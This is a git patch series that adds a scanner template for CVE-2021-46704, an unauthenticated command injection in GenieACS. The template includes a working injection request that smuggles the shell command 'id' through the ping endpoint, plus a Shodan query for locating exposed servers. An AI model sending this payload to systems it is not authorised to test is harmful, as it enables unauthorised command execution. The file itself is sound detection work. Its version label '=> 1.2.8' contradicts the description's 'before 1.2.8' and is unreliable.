From d865251122d83164f216954ffb7d1b576432700e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Jun 2023 01:33:09 +0530 Subject: [PATCH 1/3] Create CVE-2021-46704.yaml --- http/cves/2021/CVE-2021-46704.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2021/CVE-2021-46704.yaml diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml new file mode 100644 index 0000000000..d8a81ef049 --- /dev/null +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-46704 + +info: + name: GenieACS - OS Command Injection + author: DhiyaneshDK + severity: critical + description: | + In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + reference: + - https://twitter.com/shaybt12/status/1671598239835906058 + - https://github.com/advisories/GHSA-2877-693q-pj33 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-46704 + cwe-id: CWE-78 + metadata: + max-request: 1 + verified: "true" + shodan-query: http.favicon.hash:-2098066288 + tags: cve,cve2021,genieacs + +http: + - method: GET + path: + - "{{BaseURL}}/api/ping/;`id`" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9]+)" + + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 500 From 1eec2caba1fce64f8f02d6724fb722485c41f1a9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Jun 2023 01:43:37 +0530 Subject: [PATCH 2/3] trail space fix --- http/cves/2021/CVE-2021-46704.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index d8a81ef049..35e2266e2d 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-46704 - cwe-id: CWE-78 + cwe-id: CWE-78 metadata: max-request: 1 verified: "true" From 565e5d32de31bd1f773a6b1d59dfb00cadbe7604 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 22 Jun 2023 12:48:18 +0530 Subject: [PATCH 3/3] minor -update --- http/cves/2021/CVE-2021-46704.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 35e2266e2d..bdc1db3283 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -1,7 +1,7 @@ id: CVE-2021-46704 info: - name: GenieACS - OS Command Injection + name: GenieACS => 1.2.8 - OS Command Injection author: DhiyaneshDK severity: critical description: | @@ -19,7 +19,7 @@ info: max-request: 1 verified: "true" shodan-query: http.favicon.hash:-2098066288 - tags: cve,cve2021,genieacs + tags: cve,cve2021,genieacs,rce http: - method: GET